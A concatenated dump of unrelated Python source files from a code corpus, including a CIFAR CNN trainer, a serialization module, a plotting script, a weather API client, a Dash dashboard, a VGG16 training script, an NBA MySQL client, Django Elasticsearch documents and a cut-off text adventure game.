10)\n\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv,\n labels=y_))\n train_step = tf.train.AdamOptimizer(5e-4).minimize(cross_entropy) # noqa\n\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # noqa\n\n # Plug this into the test procedure as above to continue...\n def test(sess):\n X = cifar.test.images.reshape(10, 1000, 32, 32, 3)\n Y = cifar.test.labels.reshape(10, 1000, 10)\n acc = np.mean([sess.run(accuracy, feed_dict={x: X[i], y_: Y[i], keep_prob: 1.0})\n for i in range(10)])\n #print(\"Accuracy: {:.4}%\".format(acc * 100))\n return acc\n\n print('get into run_simple_net 333')\n iter_list, test_accuracy_list, train_accuracy_list = [], [], []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for i in range(STEPS):\n #print('i is ', i)\n #batch = cifar.train.next_batch(BATCH_SIZE)\n batch = cifar.train.random_batch(BATCH_SIZE)\n sess.run(train_step, feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n\n if i % 500 == 0 or i==STEPS-1:\n iter_list.append(i)\n train_acc = sess.run(accuracy, feed_dict={x: batch[0],\n y_: batch[1],\n keep_prob: 0.5})\n train_accuracy_list.append(train_acc)\n test_acc = test(sess)\n test_accuracy_list.append(test_acc)\n print(\n 'step i:{0:7} train_acc: {1:.6f} test_acc: {2:.6f}'.format(\n i, train_acc, test_acc))\n\n test(sess)\n plot_accuracy(iter_list, test_accuracy_list, train_accuracy_list)\n\n\ndef create_cifar_image():\n d = CifarDataManager()\n print(\"Number of train images: {}\".format(len(d.train.images)))\n print(\"Number of train labels: {}\".format(len(d.train.labels)))\n print(\"Number of test images: {}\".format(len(d.test.images)))\n print(\"Number of test labels: {}\".format(len(d.test.labels)))\n images = d.train.images\n labels = d.train.labels\n raw_labels = d.train.raw_labels\n #display_cifar(images, 10)\n #display_cifar_sorted(images, raw_labels, 10)\n\n\nif __name__ == \"__main__\":\n start_t = time.time()\n create_cifar_image()\n #run_simple_net()\n build_second_net()\n print('total cost time ', time.time()-start_t)\n","sub_path":"04__convolutional_neural_networks/cifar_cnn.py","file_name":"cifar_cnn.py","file_ext":"py","file_size_in_byte":10222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"413142495","text":"\"\"\"\nSerialization methods.\n\"\"\"\n\nimport abc\nimport json\nimport os\nfrom enum import Enum\nfrom typing import Dict, Union\n\nimport yaml\nfrom pydantic import BaseModel\n\nfrom .exceptions import UnsupportedFiletypeError\n\n__all__ = [\n \"Serializer\",\n \"DeSerializer\",\n \"register_serializer\",\n \"register_deserializer\",\n \"serialize\",\n \"deserialize\",\n]\n\nserializers = {}\ndeserializers = {}\n\n\nclass DataType(str, Enum):\n \"\"\"\n The type of data the de/serializers deal with, which helps with file loading.\n \"\"\"\n\n TEXT = \"\"\n BYTES = \"b\"\n\n\nclass GeneralSerializer(BaseModel):\n\n data_type: DataType\n\n class Config:\n allow_mutation = False\n extra = \"forbid\"\n\n\nclass Serializer(GeneralSerializer, abc.ABC):\n @abc.abstractmethod\n def serialize(self, serializable: Dict) -> Union[str, bytes]:\n \"\"\"\n The method should give the string representation of the serialization ready for dumping to file.\n \"\"\"\n raise NotImplementedError()\n\n\nclass DeSerializer(GeneralSerializer, abc.ABC):\n @abc.abstractmethod\n def deserialize(self, file_object) -> Dict:\n \"\"\"\n The method should return a dict representation that the pydantic models can be built from.\n \"\"\"\n raise NotImplementedError()\n\n\nclass JsonSerializer(Serializer):\n data_type = DataType.TEXT\n\n def serialize(self, serializable) -> str:\n return json.dumps(serializable, indent=2)\n\n\nclass YamlSerializer(Serializer):\n data_type = DataType.TEXT\n\n def serialize(self, serializable) -> str:\n return yaml.dump(serializable)\n\n\nclass JsonDeSerializer(DeSerializer):\n data_type = DataType.TEXT\n\n def deserialize(self, file_object) -> Dict:\n return json.load(file_object)\n\n\nclass YamlDeSerializer(DeSerializer):\n data_type = DataType.TEXT\n\n def deserialize(self, file_object) -> Dict:\n return yaml.full_load(file_object)\n\n\ndef register_serializer(format_name: str, serializer: \"Serializer\") -> None:\n \"\"\"\n Register a new serializer method with qcsubmit.\n \"\"\"\n if format_name.lower() in serializers.keys():\n raise ValueError(f\"{format_name} already has a serializer registered.\")\n\n serializers[format_name.lower()] = serializer\n\n\ndef register_deserializer(format_name: str, deserializer: DeSerializer) -> None:\n \"\"\"\n Register a new deserializer method with qcsubmit.\n \"\"\"\n if format_name.lower() in deserializers.keys():\n raise ValueError(f\"{format_name} already has a deserializer registered.\")\n\n deserializers[format_name] = deserializer\n\n\ndef unregister_serializer(format_name: str) -> None:\n \"\"\"\n Remove one of the registered serializers with qcsubmit.\n \"\"\"\n method = serializers.pop(format_name.lower(), None)\n if method is None:\n raise KeyError(f\"The serializer {format_name} is not registered\")\n\n\ndef unregister_deserializer(format_name: str) -> None:\n \"\"\"\n Remove one of the registered deserializers with qcsubmit.\n \"\"\"\n method = deserializers.pop(format_name.lower(), None)\n if method is None:\n raise KeyError(f\"The deserializer {format_name} is not registered.\")\n\n\ndef get_serializer(format_name: str) -> \"Serializer\":\n \"\"\"\n Return the requested serializer class.\n \"\"\"\n serializer = serializers.get(format_name.lower(), None)\n if serializer is None:\n raise UnsupportedFiletypeError(\n f\"The specified serialization format {format_name} is not supported; \"\n f\"supported formats are {serializers.keys()}\"\n )\n return serializer()\n\n\ndef get_deserializer(format_name: str) -> \"DeSerializer\":\n \"\"\"\n Return the requested deserializer class.\n \"\"\"\n deserailizer = deserializers.get(format_name.lower(), None)\n if deserailizer is None:\n raise UnsupportedFiletypeError(\n f\"The specified deserialization format {format_name} is not supported; \"\n f\"supported formats are {deserializers.keys()}\"\n )\n return deserailizer()\n\n\ndef get_format_name(file_name: str) -> str:\n \"\"\"\n Get the format name by splitting on the .\n\n Parameters:\n file_name: The name of the file from which we should work out the format.\n \"\"\"\n return file_name.split(\".\")[-1].lower()\n\n\ndef serialize(serializable: Dict, file_name: str) -> None:\n \"\"\"\n The main serialization method used to serialize objects.\n\n Parameters:\n serializable: The object to be serialized\n file_name: The name of the file the object will be serialized to.\n \"\"\"\n format_name = get_format_name(file_name)\n serializer = get_serializer(format_name)\n with open(file_name, \"w\" + serializer.data_type.value) as output:\n output.write(serializer.serialize(serializable))\n\n\ndef deserialize(file_name: str) -> Dict:\n \"\"\"\n The main method used to deserialize the objects from file.\n\n Parameters:\n file_name: The file from which the object should be extracted.\n \"\"\"\n format_name = get_format_name(file_name)\n deserializer = get_deserializer(format_name)\n if os.path.exists(file_name):\n with open(file_name, \"r\" + deserializer.data_type.value) as input_data:\n return deserializer.deserialize(input_data)\n else:\n raise RuntimeError(f\"The file {file_name} could not be found.\")\n\n\n# Register the json and yaml de/serializers\nregister_serializer(format_name=\"json\", serializer=JsonSerializer)\nregister_serializer(format_name=\"yaml\", serializer=YamlSerializer)\nregister_serializer(format_name=\"yml\", serializer=YamlSerializer)\nregister_deserializer(format_name=\"json\", deserializer=JsonDeSerializer)\nregister_deserializer(format_name=\"yaml\", deserializer=YamlDeSerializer)\nregister_deserializer(format_name=\"yml\", deserializer=YamlDeSerializer)\n","sub_path":"qcsubmit/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"228315066","text":"import os, sys\nimport pandas as pd, numpy as np\nfrom itertools import chain\nfrom glob import glob\nimport math, pdb\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nsys.path.append(\"./utils\")\nfrom performance_metrics import *\n\n\ndef sort_state(data,state):\n subset=data.filter(regex=state)\n subset=(subset.mean(axis=0)).sort_values(axis=0,ascending=False)\n return subset.index\n\ndef sort_models(data):\n data=(data.mean(axis=1)).sort_values(axis=0,ascending=True)\n return data.index\n\ndef create_heatmap(heatmap, states, x_labels, y_labels):\n cmap='viridis'\n font={'size':16}\n mpl.rc('font',**font)\n \n plt.figure(figsize=(20,10))\n plt.imshow(max(heatmap.max())-heatmap, cmap=cmap)\n plt.clim(min(heatmap.min()),max(heatmap.max()))\n plt.xticks(ticks=np.arange(heatmap.shape[1]), labels=(['']*len(x_labels)))\n plt.yticks(ticks=np.arange(heatmap.shape[0]), labels=np.char.replace(np.asarray(y_labels,dtype='str'),'_',' '))\n cbar=plt.colorbar(ticks=np.arange(min(heatmap.min())+(max(heatmap.max())-1),max(heatmap.max()),0.2),\n aspect=50, fraction=0.165, pad=0.02, orientation='horizontal')\n cbar.set_ticklabels(['1.0','0.8','0.6','0.4','0.2'])\n plt.tight_layout()\n ln=-0.5\n state_dict={'Arizona':'AZ', 'California':'CA', 'Florida':'FL',\n 'Wisconsin':'WI', 'Texas':'TX', 'New York':'NY',\n 'Connecticut':'CT', 'North Carolina':'NC', 'New Jersey':'NJ'}\n for state in states:\n nxt=(heatmap.filter(regex=state)).shape[1]\n ln+=nxt\n plt.text(ln-nxt/2-0.2,-0.6,state_dict[state])\n if ln<(heatmap.shape[1]-1):\n plt.axvline(x=ln,linewidth=3,color='w')\n #plt.savefig(ddir+\"revised_combined_heatmap.png\",bbox_inches='tight', dpi=600)\n plt.show()\n \n \ndef combined_metric():\n ddir=\"./results/\"\n global_fit=pd.read_csv(ddir+\"Metrics/Location_scores.csv\")\n global_fit=global_fit[global_fit.Subset==\"Test\"]\n global_fit=global_fit[~global_fit.Model.str.contains(\"LR\")]\n global_fit=global_fit[~global_fit.Model.str.contains(\"'\")]\n global_fit=global_fit[~global_fit.Model.str.contains(\"2000\")]\n global_fit=global_fit[~global_fit.Model.str.contains(\"120\")]\n global_fit=global_fit[~global_fit.Model.str.contains(\"RAW\")]\n locs=np.unique(global_fit.Location)\n models=np.unique(global_fit.Model)\n ds=np.zeros((len(models),len(locs)))\n hs=np.zeros((len(models),len(locs)))\n for i in range(0,len(models)):\n if not \"LR\" in models[i]:\n thres_mo_off=pd.read_csv(ddir+\"Threshold_tables/Test/\"+models[i].lower()+\"_D_off_table.csv\")\n thres_mo_on=pd.read_csv(ddir+\"Threshold_tables/Test/\"+models[i].lower()+\"_D_on_table.csv\")\n for j in range(0,len(locs)):\n subset=global_fit[(global_fit.Model==models[i]) & (global_fit.Location==locs[j])]\n m1=(1-np.sqrt(subset.R2**2*subset.Pearson**2))\n m2=np.sqrt(subset.AUC_Diff**2+subset.RMSE**2)\n d=np.average(np.sqrt(m1**2+m2**2))\n ds[i,j]=d\n thres_off=thres_mo_off[(thres_mo_off.City==locs[j].split(',')[0]) & (thres_mo_off.State==locs[j].split(',')[-1])]\n thres_on=thres_mo_on[(thres_mo_on.City==locs[j].split(',')[0]) & (thres_mo_on.State==locs[j].split(',')[-1])]\n Z=(1+(thres_on[[\"20%\",\"40%\",\"60%\",\"80%\"]].isna()*1).sum(axis=0)/len(thres_on))\n for col in [\"20%\",\"40%\",\"60%\",\"80%\"]:\n if thres_on[col].isna().any():\n thres_on[col].fillna(np.mean(np.absolute(thres_mo_on[col])), inplace=True)\n if thres_off[col].isna().any():\n thres_off[col].fillna(np.mean(np.absolute(thres_mo_off[col])), inplace=True)\n ht=1/sum(Z)*sum(Z*np.sqrt(np.mean(np.absolute(thres_on[[\"20%\",\"40%\",\"60%\",\"80%\"]]))*\n np.std(np.absolute(thres_on[[\"20%\",\"40%\",\"60%\",\"80%\"]]))+\n np.mean(np.absolute(thres_off[[\"20%\",\"40%\",\"60%\",\"80%\"]]))*\n np.std(np.absolute(thres_off[[\"20%\",\"40%\",\"60%\",\"80%\"]]))))\n if math.isnan(ht):\n print(locs[j]+\",\"+models[i])\n #hs[i,j]=max(hs.max(),100)\n hs[i,j]=ht\n ds=ds/np.nanmax(ds)\n hs=hs/np.nanmax(hs)\n S=np.sqrt(ds**2+hs**2)\n S=pd.DataFrame(S,columns=locs,index=models)\n S.to_csv(ddir+\"combined_scores.csv\")\n return S\n\nif __name__ == '__main__':\n\n scores=combined_metric()\n states=[\"Wisconsin\",\"California\",\"Arizona\",\"Connecticut\",\"North Carolina\",\n \"New York\",\"New Jersey\",\"Texas\",\"Florida\"]\n loc_order=list()\n for state in states:\n order=sort_state(scores,state)\n loc_order.append(order)\n loc_order=list(chain(*loc_order))\n mo_order=sort_models(scores)\n scores=scores[loc_order].loc[mo_order]\n create_heatmap(scores, states, loc_order, mo_order)\n","sub_path":"figures/fig_8_combined_scores_heatmap.py","file_name":"fig_8_combined_scores_heatmap.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"592750219","text":"import json\nimport sys\nimport urllib.request\nfrom collections import namedtuple\n\nWeather = namedtuple('Weather', ['location', 'temperature', 'air_pressure', 'humidity', 'state'])\n\n\ndef get_location_id(location_name):\n with urllib.request.urlopen(f'https://www.metaweather.com/api/location/search/?query={location_name}') as f:\n results = json.loads(f.read().decode('utf-8'))\n return results[0]['woeid']\n\n\ndef get_location_weather(location_id):\n with urllib.request.urlopen(f'https://www.metaweather.com/api/location/{location_id}') as f:\n result = json.loads(f.read().decode('utf-8'))\n return Weather(\n location=result['title'],\n temperature=result['consolidated_weather'][0]['the_temp'],\n air_pressure=result['consolidated_weather'][0]['air_pressure'],\n humidity=result['consolidated_weather'][0]['humidity'],\n state=result['consolidated_weather'][0]['weather_state_name']\n )\n\ndef main():\n while True:\n miasto = input('\\nPodaj miasto: ')\n if miasto == '': break\n try:\n location_id = get_location_id(miasto)\n weather = get_location_weather(location_id)\n print('Obiekt:', weather)\n print(f'Pogoda w {weather.location}:')\n print(f'- temperatura: {weather.temperature:.2f}°C')\n print(f'- ciśnienie: {weather.air_pressure} hPa')\n print(f'- wilgotność: {weather.humidity}%')\n print(f'- stan: {weather.state}')\n except Exception as e:\n print('Problem, prawdopodobnie nieznane miasto')\n print(e)\n\nif __name__ == '__main__':\n main()\n","sub_path":"python3days/p08_json/pogoda4.py","file_name":"pogoda4.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"104788692","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nimport pandas as pd\n\nimport sys\nimport os\n\nimport agatha as ag\nimport agatha.io as io\nfrom agatha.constants import DBConnections\nagl = ag.io.AGLDatabase()\n\n\napp = dash.Dash()\napp.css.config.serve_locally = True\napp.scripts.config.serve_locally = True\n\n\n\n#FrameLoadDate = '2017-12-12'\nsql = \"\"\"SELECT *\n FROM [Frame_Inbound].[HANA].[TBL_CalculatedTransferPriceMonthlyLoad]\n where FrameLoadDate = '2017-12-12' and year = 2017 and month >= 10\"\"\"\n\ndf = agl.simple_query(sql,DBConnections.FRAME_INBOUND)\ndf = df[df.PORTFOLIO.isin(['VIC_C', 'NSW_C', 'SA_C'])]\navailable_portfolios = df['PORTFOLIO'].unique()\n# options=[{'label': i, 'value': i} for i in available_portfolios]\n\n\napp.layout = html.Div([\n html.Div(\n dcc.Dropdown(\n id='Portfolio',\n options=[{'label': i, 'value': i} for i in available_portfolios],\n value = ['VIC_C'],\n clearable = True,\n multi = True\n ),\n style={'width': '28%', 'display': 'inline-block'}\n ),\n\n dcc.Graph(id = 'indicator-graphic'),\n\n dcc.Slider(\n id='year--slider',\n min=df['MONTH'].min(),\n max=df['MONTH'].max(),\n value=df['MONTH'].min(),\n step=None,\n marks={str(month): str(month) for month in df['MONTH'].unique()}\n ),\n\n html.Div(children=[\n html.H4(children='Business Customers Details'),\n html.Div([])\n ])\n\n])\n\n\n@app.callback(\n dash.dependencies.Output('indicator-graphic', 'figure'),\n [dash.dependencies.Input('Portfolio', 'value'),\n dash.dependencies.Input('year--slider', 'value')]\n)\ndef update_graph(selected_portfolios, year_value):\n filtered_df = df[(df.PORTFOLIO.isin(list(selected_portfolios))) & (df.MONTH == year_value)]\n\n traces = []\n\n for i in filtered_df.PORTFOLIO.unique():\n df_by_portfolio = filtered_df[filtered_df['PORTFOLIO'] == i]\n traces.append(go.Scatter(\n x = df_by_portfolio['PEAK_LOAD'],\n y = df_by_portfolio['PEAK_TRANSFER_PRICE'],\n text = df_by_portfolio['PORTFOLIO'],\n mode = 'markers',\n opacity=0.7,\n marker = {\n 'size': 15,\n 'opacity': 0.5,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name = i\n ))\n\n return {\n 'data': traces,\n 'layout': go.Layout(\n xaxis = {'title': 'MWh per Month'},\n yaxis = {'title': 'Price $$$'},\n margin={'l': 40, 'b': 40, 't': 10, 'r': 20},\n hovermode='closest'\n )\n }\n\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, port=8052)\n","sub_path":"DashTest_DropDownButton.py","file_name":"DashTest_DropDownButton.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"347282592","text":"from keras.applications.vgg16 import VGG16\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Dense,GlobalAveragePooling2D\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing import image\nimport numpy as np\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom pickle import dump\n\n\nif __name__ == \"__main__\":\n\n\n\n vggmodel = VGG16(weights='imagenet', include_top=False)\n\n trdata = ImageDataGenerator(rescale=1./255,preprocessing_function=preprocess_input,\n \trotation_range=180,\n \tzoom_range=0.15,\n \twidth_shift_range=0.2,\n \theight_shift_range=0.2,\n \tshear_range=0.15,\n \thorizontal_flip=True,\n vertical_flip = True,\n \tfill_mode=\"nearest\",\n brightness_range = [0.,1.])\n\n traindata = trdata.flow_from_directory(directory=\"datasets/train\",color_mode='rgb',batch_size= 32)\n # trdata.fit(traindata)\n\n tsdata = ImageDataGenerator(rescale=1./255,preprocessing_function=preprocess_input)\n\n testdata = tsdata.flow_from_directory(directory=\"datasets/val\",color_mode='rgb',batch_size= 32)\n\n\n num_class = np.unique(testdata.classes).shape[0]\n\n\n x=vggmodel.output\n x=GlobalAveragePooling2D()(x)\n x=Dense(1024,activation='relu')(x) #we add dense layers so that the model can learn more complex functions and classify for better results.\n x=Dense(1024,activation='relu')(x) #dense layer 2\n x=Dense(512,activation='relu')(x) #dense layer 3\n\n preds = Dense(num_class, activation=\"softmax\")(x)\n model_final = Model(inputs = vggmodel.input, outputs = preds)\n\n\n # for layer in model_final.layers[:19]:\n # layer.trainable=False\n for layer in model_final.layers[:]:\n layer.trainable=True\n\n model_final.compile(loss = \"categorical_crossentropy\",\n optimizer = optimizers.adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, amsgrad=False),\n metrics=[\"accuracy\"])\n\n\n checkpoint = ModelCheckpoint(\"vgg16_transforms.h5\", monitor='val_accuracy', verbose=1,\n save_best_only=True, save_weights_only=False, mode='auto', period=1)\n\n early = EarlyStopping(monitor='val_accuracy', min_delta=0, patience=40, verbose=1, mode='auto')\n\n\n hist = model_final.fit_generator(generator= traindata, steps_per_epoch= 2060, epochs= 30,\n validation_data= testdata, validation_steps=0, callbacks=[checkpoint,early])\n\n\n with open('History_transform', 'wb') as handle: # saving the history of the model\n dump(hist.history, handle)\n","sub_path":"vgg_full_rotated/vgg_transformed_images.py","file_name":"vgg_transformed_images.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"461872887","text":"import mysql.connector\n\n\n\n\n\ntry:\n cnx = mysql.connector.connect(\n user='token_a2ef',\n host='127.0.0.1',\n database='jab0629_NBA',\n password = 'oTGVlYROiXumBDOk'\n )\n\n cursor = cnx.cursor()\n response = 1\n print (\"\")\n print (\"Welcome to NBA database client\")\n while (response > 0): \n print (\"\")\n print (\"Main Menu:\")\n print (\"Press 1 to see all teams\")\n print (\"Press 2 to see all players on a specific team\")\n print (\"Press 3 to see information about the tallest or heaviest players\")\n print (\"Press 4 to filter players by position \")\n print (\"Press 0 to exit\")\n\n\n completedItemNumber = 0 ##updates with each completion\n\n num = int(input(\"Please select an option: \")) ##reads choice for menu option\n \n\n if num==1: \n print (\"\") \n\n cursor.execute(\"\"\"SELECT team.team_name FROM team\"\"\") ##see all team names\n\n for (team_name) in cursor: ##print all team names\n print(f'{team_name}')\n \n elif num==2: #see all players on team read from stdin\n print (\"\")\n teamName = input(\"Please enter a team name to view: \") \n print(\"\")\n #select all team names of name : , display player and team name\n cursor.execute(\"\"\"SELECT Player.fname, Player.lname, team.team_name \n FROM team\n INNER JOIN Player on team.id = Player.team_id\n WHERE team.team_name = %s\"\"\", (teamName,))\n\n for (fname,lname,team_name) in cursor:\n print(f'{fname} {lname}')\n\n\n elif num==3:\n print (\"\") #show name ht, wt, team name of heaviest or tallest players\n choose = input(\"Please enter either height or weight to see the three tallest or heaviest players: \")\n if choose=='height':\n\n cursor.execute(\"\"\"SELECT Player.fname, Player.lname, Player.heightInCm, Player.weightInLbs, team.team_name \n FROM team\n INNER JOIN Player on team.id = Player.team_id\n ORDER BY heightInCm DESC limit 3;\"\"\")\n\n for (fname,lname,heightInCm, weightInLbs,team_name) in cursor:\n print(\"\")\n print(f'{fname} {lname} of the {team_name } stands tall at: {heightInCm} cm weighing: {weightInLbs} lbs')\n\n elif choose=='weight':\n\n cursor.execute(\"\"\"SELECT Player.fname, Player.lname, Player.heightInCm, Player.weightInLbs, team.team_name \n FROM team\n INNER JOIN Player on team.id = Player.team_id\n ORDER BY weightInLbs DESC limit 3;\"\"\")\n for (fname,lname,heightInCm, weightInLbs,team_name) in cursor:\n print(\"\")\n print(f'{fname} {lname} of the {team_name } stands tall at: {heightInCm} cm weighing: {weightInLbs} lbs')\n \n elif num==4:\n print (\"\")\n \n choose = input(\"Please enter the position of the players you wish to see (F is Forward, G is Guard, C is Center: \")\n #selects player,team name, jersey no, and home state of player \n cursor.execute(\"\"\"SELECT Player.fname,Player.lname,team.team_name,Player.jersey_num, Player.home_state \n FROM team\n INNER JOIN Player on team.id = Player.team_id\n WHERE Player.position = %s\"\"\", (choose,))\n\n for (fname,lname,team_name,jersey_num,home_state) in cursor:\n print(\"\")\n print(f'{fname} {lname} of the {team_name } wearing jersey number {jersey_num} of {home_state}')\n\n\n\n\n elif num==0:\n response=0\n else:\n print (\"no such menu option\")\n\n\n\n #break\nexcept mysql.connector.Error as err:\n print(err)\nelse: \n # Invoked if no exception was thrown\n cnx.close()\n","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"307462282","text":"from django_elasticsearch_dsl import DocType, Index, fields\r\nfrom website.profile import Profile, Founder, Job, Experience\r\nfrom website.models import MyUser\r\nfrom django.conf import settings\r\nfrom elasticsearch_dsl import analyzer, tokenizer\r\n\r\n# Profile search document\r\npeople_index_name = 'people'\r\nif hasattr(settings, 'ELASTIC_PREFIX') and settings.ELASTIC_PREFIX:\r\n people_index_name = settings.ELASTIC_PREFIX + '_' + people_index_name\r\n\r\n# Startup search document\r\nstartup_index_name = 'startup'\r\nif hasattr(settings, 'ELASTIC_PREFIX') and settings.ELASTIC_PREFIX:\r\n startup_index_name = settings.ELASTIC_PREFIX + '_' + startup_index_name\r\n\r\n# Job search document\r\njob_index_name = 'job'\r\nif hasattr(settings, 'ELASTIC_PREFIX') and settings.ELASTIC_PREFIX:\r\n job_index_name = settings.ELASTIC_PREFIX + '_' + job_index_name\r\n\r\npeople = Index(people_index_name)\r\npeople.settings(\r\n number_of_shards=1,\r\n number_of_replicas=0,\r\n)\r\n\r\nstartup = Index(startup_index_name)\r\nstartup.settings(\r\n number_of_shards=1,\r\n number_of_replicas=0,\r\n)\r\n\r\njob = Index(job_index_name)\r\njob.settings(\r\n number_of_shards=1,\r\n number_of_replicas=0,\r\n)\r\n\r\nleave_default = analyzer(\r\n 'leave_default',\r\n tokenizer=\"standard\",\r\n filter=[\"standard\"]\r\n)\r\n\r\n@people.doc_type\r\nclass PeopleDocument(DocType):\r\n user = fields.ObjectField(properties={\r\n 'is_active': fields.BooleanField(),\r\n 'is_individual': fields.BooleanField(),\r\n 'is_account_disabled': fields.BooleanField(),\r\n 'first_name': fields.StringField(),\r\n 'last_name': fields.StringField(),\r\n 'last_activity': fields.DateField(attr='last_activity.date')\r\n })\r\n experience_set = fields.NestedField(properties={\r\n 'company': fields.StringField(),\r\n 'position': fields.StringField(),\r\n 'description': fields.TextField(),\r\n })\r\n positions = fields.StringField()\r\n image = fields.StringField(attr='image_url')\r\n # image_thumbnail = fields.StringField(attr='image_thumbnail_url')\r\n get_positions_display = fields.StringField(attr='get_positions_display')\r\n get_major_display = fields.StringField(attr='get_major_display')\r\n get_year_display = fields.StringField(attr='get_year_display')\r\n get_role_display = fields.StringField(attr='get_role_display')\r\n get_hours_week_display = fields.StringField(attr='get_hours_week_display')\r\n\r\n major = fields.StringField(attr='major', analyzer=leave_default)\r\n year = fields.StringField(attr='year', analyzer=leave_default)\r\n role = fields.StringField(attr='role', analyzer=leave_default)\r\n\r\n class Meta:\r\n model = Profile\r\n ignore_signals = False\r\n related_models = [MyUser, Experience]\r\n fields = [\r\n 'is_filled',\r\n 'hours_week',\r\n 'has_startup_exp',\r\n 'has_funding_exp',\r\n 'bio',\r\n 'skills',\r\n 'interests',\r\n 'courses',\r\n 'mentor'\r\n ]\r\n\r\n def get_instances_from_related(self, related_instance):\r\n if isinstance(related_instance, MyUser):\r\n if hasattr(related_instance, 'profile'):\r\n return related_instance.profile\r\n if isinstance(related_instance, Experience):\r\n return related_instance.profile\r\n\r\n\r\n@startup.doc_type\r\nclass StartupDocument(DocType):\r\n user = fields.ObjectField(properties={\r\n 'is_active': fields.BooleanField(),\r\n 'is_founder': fields.BooleanField(),\r\n 'is_account_disabled': fields.BooleanField(),\r\n 'first_name': fields.StringField(),\r\n 'last_name': fields.StringField(),\r\n 'last_activity': fields.DateField(attr='last_activity.date')\r\n })\r\n job_set = fields.NestedField(properties={\r\n 'title': fields.StringField(),\r\n 'description': fields.StringField(),\r\n 'level': fields.StringField(attr='get_level_display'),\r\n 'pay': fields.StringField(attr='get_pay_display')\r\n })\r\n logo = fields.StringField(attr='logo_url')\r\n # logo_thumbnail = fields.StringField(attr='logo_thumbnail_url')\r\n get_stage_display = fields.StringField(attr='get_stage_display')\r\n get_field_display = fields.StringField(attr='get_field_display')\r\n stage = fields.StringField(attr='stage', analyzer=leave_default)\r\n field = fields.StringField(attr='field', analyzer=leave_default)\r\n\r\n class Meta:\r\n model = Founder\r\n related_models = [MyUser, Job]\r\n fields = [\r\n 'startup_name',\r\n 'description',\r\n 'is_filled',\r\n 'employee_count'\r\n ]\r\n\r\n def get_instances_from_related(self, related_instance):\r\n if isinstance(related_instance, MyUser):\r\n if hasattr(related_instance, 'founder'):\r\n return related_instance.founder\r\n if isinstance(related_instance, Job):\r\n return related_instance.founder\r\n\r\n\r\n@job.doc_type\r\nclass JobDocument(DocType):\r\n founder = fields.ObjectField(properties={\r\n 'id': fields.IntegerField(),\r\n 'startup_name': fields.StringField(),\r\n 'description': fields.StringField(),\r\n 'logo': fields.StringField(attr='logo_url'),\r\n # 'logo_thumbnail': fields.StringField(attr='logo_thumbnail_url'),\r\n 'is_filled': fields.BooleanField(),\r\n 'field': fields.StringField(attr='field', analyzer=leave_default),\r\n 'user': fields.ObjectField(properties={\r\n 'is_active': fields.BooleanField(),\r\n 'is_account_disabled': fields.BooleanField(),\r\n 'last_activity': fields.DateField(attr='last_activity.date')\r\n })\r\n })\r\n get_pay_display = fields.StringField(attr='get_pay_display')\r\n get_level_display = fields.StringField(attr='get_level_display')\r\n\r\n pay = fields.StringField(attr='pay', analyzer=leave_default)\r\n level = fields.StringField(attr='level', analyzer=leave_default)\r\n\r\n class Meta:\r\n model = Job\r\n related_models = [Founder, MyUser]\r\n fields = [\r\n 'title',\r\n 'description'\r\n ]\r\n\r\n def get_instances_from_related(self, related_instance):\r\n if isinstance(related_instance, MyUser):\r\n if hasattr(related_instance, 'founder'):\r\n return related_instance.founder.job_set.all()\r\n if isinstance(related_instance, Founder):\r\n return related_instance.job_set.all()\r\n","sub_path":"search/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"6443724","text":"import random\nimport time\n\ndef introduccion():\n print (\"Bienvenido ganador. Estamos en una tierra llena de dragones. Delante nuestro,\")\n time.sleep(2)\n print (\"se ven dos cuevas. En una cueva, el dragon es amigable\")\n time.sleep(2)\n print (\"y compartira el tesoro contigo. El otro dragon\")\n time.sleep(2)\n print (\"es codicioso y hambriento, y te va a comer.\")\n time.sleep(2)\n print (\"\")\n\ndef CambiarCueva():\n cueva = \"\"\n while cueva != \"1\" and cueva != \"2\":\n print (\"A que cueva quieres entrar? 1 o 2?\")\n cueva = input()\n \n return cueva\n\ndef cheqcueva(CambiarCueva):\n print (\"Te acercas a la Cueva...\")\n time.sleep(2)\n print (\"Esta oscuro y tenebroso...\")\n time.sleep(2)\n print (\"Un gran dragon salta delante tuyo, abre su boca y...\")\n print (\"\")\n time.sleep(2)\n \n FriendlyCueva = random.randint (1, 2)\n \n if CambiarCueva == str(FriendlyCueva):\n print (\"Te entrega el tesoro...\")\n else:\n print (\"El dragon te come de un bocado....\")\n \nEmpezarNuevo = (\"si\")\n\nwhile EmpezarNuevo == (\"s\") or EmpezarNuevo == (\"si\"):\n \n 